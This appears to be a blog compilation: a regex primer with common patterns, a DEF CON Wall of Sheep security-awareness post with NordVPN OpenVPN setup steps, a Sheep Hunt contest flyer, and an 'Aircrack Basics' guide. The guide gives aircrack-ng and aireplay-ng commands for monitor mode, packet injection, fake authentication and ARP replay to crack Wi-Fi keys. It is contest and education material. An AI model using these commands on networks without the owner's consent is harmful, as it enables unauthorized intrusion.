REGEX - Regular Expressions

What is Regex?

Regular expressions (regex) are sequences of characters that form search patterns, primarily used for string matching within texts. Regex is an essential tool in programming, data analysis, and text processing, helping to find, match, replace, or extract specific patterns of text efficiently.

Key Concepts of Regex:

• Literals: Characters that match themselves. For example, the regex cat matches the string "cat" in the text.
• Metacharacters: Special characters that have specific meanings in regex, such as . (dot), *, +, ?, \, ^, and $.
• Character Classes: Enclosed in square brackets [ ], they match any one of a specific set of characters. For example, [abc] matches "a", "b", or "c".
• Quantifiers: These specify how many times the preceding element should be matched. Examples include * (0 or more), + (1 or more), and {n} (exactly n times).
• Anchors: ^ matches the start of a string, and $ matches the end.
• Groups and Capturing: Parentheses () are used to group parts of a regex and capture the matched content for later use.

Top 10 Most Common Regex Patterns:

1. Matching a Specific Word:

   • Regex: \bword\b
   • Explanation: Matches the exact word "word". The \b asserts a word boundary to ensure "word" isn't part of a larger word.

2. Matching an Email Address:

   • Regex: \b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Z|a-z]{2,}\b
   • Explanation: Matches most common email addresses.

3. Matching a URL:

   • Regex: https?://[^\s/$.?#].[^\s]*
   • Explanation: Matches both "http" and "https" URLs.

4. Matching a Date (YYYY-MM-DD):

   • Regex: \b\d{4}-\d{2}-\d{2}\b
   • Explanation: Matches dates in the format of 2024-08-13.

5. Matching a Phone Number:

   • Regex: \b\d{3}[-.]?\d{3}[-.]?\d{4}\b
   • Explanation: Matches phone numbers like 123-456-7890, 123.456.7890, or 1234567890.

6. Matching Digits (Numbers):

   • Regex: \d+
   • Explanation: Matches one or more digits.

7. Matching a Postal Code (US):

   • Regex: \b\d{5}(?:-\d{4})?\b
   • Explanation: Matches US postal codes like 12345 or 12345-6789.

8. Matching a Hexadecimal Color Code:

   • Regex: #?([A-Fa-f0-9]{6}|[A-Fa-f0-9]{3})\b
   • Explanation: Matches 3 or 6 digit hex color codes like #a3c113 or #a3c.

9. Matching Whitespace:

   • Regex: \s+
   • Explanation: Matches one or more whitespace characters, including spaces, tabs, and newlines.

10. Matching a Specific Character Range:

    • Regex: [A-Za-z0-9]
    • Explanation: Matches any alphanumeric character (a-z, A-Z, 0-9).

Practical Uses:

• Search and Replace: Quickly find and replace text in documents or code.
• Validation: Validate user inputs like email addresses, phone numbers, and URLs.
• Data Extraction: Extract relevant pieces of text, such as dates, phone numbers, or identifiers from larger texts.

Regular expressions (regex) have a wide range of practical applications across different fields, especially in programming, data analysis, and system administration. Here’s a breakdown of some of the most common practical applications:

1. Text Search and Replace

• Application: In text editors or integrated development environments (IDEs), regex is often used for search and replace functions. For example, you might want to find all occurrences of a word and replace them with another word across an entire codebase or document.
• Example: Replacing all instances of "HTTP" with "HTTPS" in a large set of HTML files.

2. Input Validation

• Application: Regex is used to validate user input in forms, ensuring the data entered is in the correct format before it's processed. This is particularly common in web development.
• Example: Validating email addresses, phone numbers, postal codes, or passwords on a website form to ensure they meet specific criteria.

3. Data Extraction and Parsing

• Application: Extract specific pieces of data from a larger body of text. This is useful when dealing with logs, scraping data from web pages, or processing text files.
• Example: Extracting all dates from a document or pulling out specific fields like phone numbers or email addresses from a block of text.

4. Log Analysis

• Application: System administrators and developers use regex to parse and analyze log files, searching for patterns that indicate errors, security breaches, or other issues.
• Example: Searching for IP addresses or error codes in server logs to identify failed login attempts or system errors.

5. Web Scraping

• Application: When extracting data from web pages, regex can help identify and extract relevant information, such as links, headings, or other specific data points.
• Example: Scraping prices from an e-commerce website or extracting metadata from HTML tags.

6. Data Cleaning

• Application: In data analysis, regex is used to clean and preprocess data. This might involve removing unwanted characters, splitting strings, or standardizing formats.
• Example: Cleaning up inconsistent phone number formats in a dataset or removing HTML tags from text data.

7. Syntax Highlighting

• Application: IDEs and text editors use regex for syntax highlighting, where different parts of code are colored differently based on their function (e.g., keywords, variables, strings).
• Example: Highlighting all instances of function names in a Python script or HTML tags in a web development environment.

8. Automated Testing

• Application: Regex can be used in automated testing frameworks to verify that certain outputs match expected patterns, especially in unit tests.
• Example: Checking that a generated string matches the expected format of an email address or URL.

9. Security Applications

• Application: Regex can be used to identify and filter out potentially harmful input, such as SQL injection attacks or cross-site scripting (XSS) attempts, by recognizing suspicious patterns.
• Example: Sanitizing user input to prevent injection attacks by ensuring no harmful code is passed through forms.

10. Search Engines and Query Tools

• Application: Search engines and query tools use regex to allow users to perform complex search queries. This is useful when you need to find specific data patterns within a large dataset or document repository.
• Example: Searching for documents containing specific file names or patterns within a directory of files.

11. File Renaming

• Application: Bulk renaming files based on patterns, which is useful when organizing large sets of files, such as images or documents.
• Example: Renaming all files in a directory to include a timestamp or a specific prefix/suffix.

12. Natural Language Processing (NLP)

• Application: Regex is used in NLP tasks to tokenize text, identify specific linguistic patterns, or clean up text data before analysis.
• Example: Identifying and extracting hashtags or mentions from social media posts.

13. Configuration File Editing

• Application: Regex is useful for editing configuration files programmatically, especially when you need to change specific settings across many files.
• Example: Changing configuration parameters in multiple server files without manually editing each one.

14. Programming Languages and Frameworks

• Application: Many programming languages, including Python, JavaScript, Perl, and others, have built-in support for regex, making it an essential tool for developers.
• Example: Using regex in a Python script to validate input, search within files, or manipulate strings.

15. Command Line Tools

• Application: Command line utilities like grep, sed, and awk in Unix/Linux environments use regex for powerful text processing.
• Example: Using grep to find lines in a file that match a pattern, or sed to replace text patterns in a file.

Real-World Example:

Imagine you are managing a large database of customer records, and you need to find all entries where the email address domain is incorrect (e.g., ".con" instead of ".com"). You could use a regex to identify and correct these errors across the entire dataset quickly.

Summary:

Regex is a powerful tool that, when mastered, can significantly speed up tasks related to text processing, data validation, and pattern matching across various industries and applications. Its versatility makes it a valuable skill for developers, data scientists, system administrators, and anyone dealing with large amounts of text or data.

Learning Regex:

Regex may seem complex at first, but it's a powerful tool once mastered. Start with simple patterns and gradually move to more complex ones. There are many online tools, like regex101.com, to practice and test your regular expressions.

Some Defense Against the Dark Arts.

2018.0406 Note: This post has been sitting in my draft files for a long while.  It's old but it should still be pretty significant today.  

===============

If you have ever visited the Wall of Sheep (WoS) at the Packet Hacking Village (PHV) in  DEF CON and just decided to sight see, that's all good. If you were to take away anything from that short visit, we hope you took note of the discretely posted warnings on posters, t-shirts and stickers.  Too often, media postings will say that WoS' goal is too shame unsuspecting attendees.  Well, I assure you that is not the intent.  The WoS mission has always been education, awareness and protection.  Here are some of the messages that have been used by PHV thru the years...

"SECURITY AWARENESS FOR THE FLOCK"
"Don't Get Caught Without Encryption"
"On The Air, Beware..."

With that said, let's start with the basics....at a minimal use VPN.  The following is ripped from NordVPNs Linux install page.  I do not work for NordVPN, but they do claim total anonymity including taking payments with gift cards (Starbucks, GAP, Old Navy...etc.)  There are free VPN services out there like VPNBook, but they did not indicate if they are logging or not.

How to connect to OpenVPN via shell:
1. Open terminal (keyboard shortcut: Ctrl + Alt + T).
2. Install OpenVPN client by entering `sudo apt-get install openvpn` (if you are requested a password, enter the password which you have used when creating your account).
3. Navigate to OpenVPN configuration directory with command `cd /etc/openvpn`
4. Download OpenVPN configuration files with command `sudo wget https://nordvpn.com/api/files/zip`
4.1. In case you will get `ERROR: The certificate of `nordvpn.com’ is not trusted.`, please install `ca-certificates` package with command `apt-get install ca-certificates`
5. If you do not have `unzip` package installed, download it by typing in `sudo apt-get install unzip`
6. Extract `config.zip` with command `sudo unzip zip`
7. Remove files which will be no longer used: `sudo rm zip`
8. To see the list of all available servers, simply enter `ls -al` command and it will print full configuration file list.
9. Choose a server which you would like to connect to.
10. Start OpenVPN with a chosen configuration by entering `sudo openvpn [file name]` (for example: `sudo openvpn at1.nordvpn.com.udp1194.ovpn`).
11. OpenVPN will ask you for credentials, so simply enter those in with your NordVPN account credentials.
12. You have successfully connected to VPN. To disconnect from the OpenVPN connection simply open terminal and press Ctrl + C on your keyboard.

How to connect to OpenVPN via Network Manager:

1. Open Terminal, Applications->Accessories->Terminal

2. Install network-manager-openvpn by typing in Terminal:
sudo apt-get install network-manager-openvpn-gnome
Press Enter (Enter password if it needed).

3. You will be prompted: Do you want to continue? Y/n Type Y and hit Enter.
4. Once installation is complete, restart Network Manager by typing:
sudo restart network-manager
Press Enter.

5. Network-manager is now running. Now download OpenVPN configuration files package from: .ovpn file package and CA & tls-auth certificate file package: CA and TLS certificates and extract them.
6. Click on the double arrow button at the top right of the screen and then select Edit Connections… from the drop-down.

7. You will be prompted to choose a connection type. Select Import a saved VPN configuration… and click on Create…

8. You will be prompted a window to select a file that you would like to import. Please navigate to a folder where you have extracted the configuration files and select one of the files from the list and click Open. You can check what file corresponds which server at our server list.

9. In the popped window select VPN tab.
GENERAL
Gateway: an IP or the hostname of the server (usually the server IP is already set in).
AUTHENTICATION
Type: Password;
User name: Your NordVPN username;
Password: Your NordVPN password;
CA Certificate: select a corresponding .crt file to the server which you are setting up, from the certificate file which you have downloaded previously.
Click on Advanced…


10. Open TLS Authentication tab.
Subject match: leave blank;
Verify peer (server) certificate usage signature: check and select Server;
Use additional TLS authentication: check;
Key file: select a corresponding .key file to the server which you are setting up, from the certificate file which you have downloaded previously;
Key direction: 1.
Click Ok and Save the configuration.


11. Now click on the double arrow button at the top right of the screen again and then select VPN connections from the drop-down.
Select the server which you have set up and click on it.

Congrats! You are connected to VPN. In NordVPN’s site you can check if the connection works well for you. Refresh the website and check if the status is shown as Secured. Until next time friends!

DEFCON 25: SHEEP HUNT 2017

SHEEP HUNT 2017

The Wall of Sheep (WOS)

Packet Hacking Village (PHV)

It is time to scour the DEF CON airwaves for lost SHEEPS. Collect clues by playing and solving the different Sheep Hunt challenges.  ALL SKILL LEVELS ARE WELCOME! From n00b to 1337!

REGISTER NOW!    

GEAR NEEDED

●     Laptop w/ Kali + wireless sniffing capabilities

●     RF Devices - RTL-SDR, HackRFOne, UberTooth, YardStickOne…

●     iPhone / Android w/ QRCode and/or RFiD scanners apps

USE OUR GEAR:

We get it! Who in their right mind would scan DEF CON’s wireless networks?  Ask a Sheep Hunt volunteer, and we’ll get you started.  (First come, First serve. Limited time use gear.)

THE SHEEP LIST

1.      QR: Hunt for QRCodes and scan for clues! Earn points by deciphering the clues.

*QRCode scanner apps work in AIRPLANE MODE or with your mobile data turned-off.

2. NFC: Hunt for NFC tags hidden in the PHV, the Wall of Sheep, or on PHV staff.  Earn points by deciphering the clues.  *NFC scanner apps should work in AIRPLANE MODE or with your mobile data off.

3. RF: Hunt for RF beacons hidden around the DEF CON hallways. Use our military-grade RF gear.  Listen and decipher the secret messages by using RF scanners.

4. AP: Find the correct SHEEP HUNT APs and start cracking.   Every key you crack & submit earns you points.  Clues to identify the correct APs are in the QR, NFC and RF challenges.

For hints follow @wallofsheep on Twitter

Hashtag #WOSSH #PHV #WOS

DEFCON 25: Aircrack Basics

NOTE: The instructions below are for concept learning and education purposes only. It is illegal to hack an access point without the owner’s consent.

PHASE 1 – Monitor Mode

OPEN A TERMINAL WINDOW (Terminal 1)

1.    To set your wireless interface to monitor mode.

airmon-ng start [interface]

2.    Start monitoring the wireless traffic, and save it to a file.

airodump-ng [interface] -w [filename] [interface]

PHASE 2 – Generate IVs

OPEN A SECOND TERMINAL WINDOW (Terminal 2)

1.    Generate IVs (Initialization Vectors) by using “aireplay-ng”.
2.  Type: aireplay-ng --help to see the syntax and switches.

2.    Test the target’s ability for accept packet injection, type:

aireplay-ng -9 -e [vic ssid] -a [vic mac] [interface]

-The ideal outcome is for a 100% injection result.

3.    List the aireplay-ng help to view the attack modes available.  Be patient and creative. Here are some examples below:  

Fake Authentication with target AP

Ex.1 - aireplay-ng -1 0 -e [vic ssid] -a [vic mac] -h [your mac] [interface]

Ex.2 - aireplay-ng -1 6000 -o 1 -q 10 e [vic ssid] -a [vic mac] -h [your mac] [interface]

Standard ARP-request replay

aireplay-ng -3 -b [vic mac] -h [your mac] [interface]

PHASE 3 - Cracking

OPEN A THIRD TERMINAL WINDOW (Terminal 3)

1.    Start cracking, type: aircrack-ng [filename] – Filename is the location and name of the file you are dumping from Terminal 1.

2.    Pick the target SSID to start cracking.

OR use WIFITE

Wi-Fi SHEEP HUNT 2016 Official Contest Brief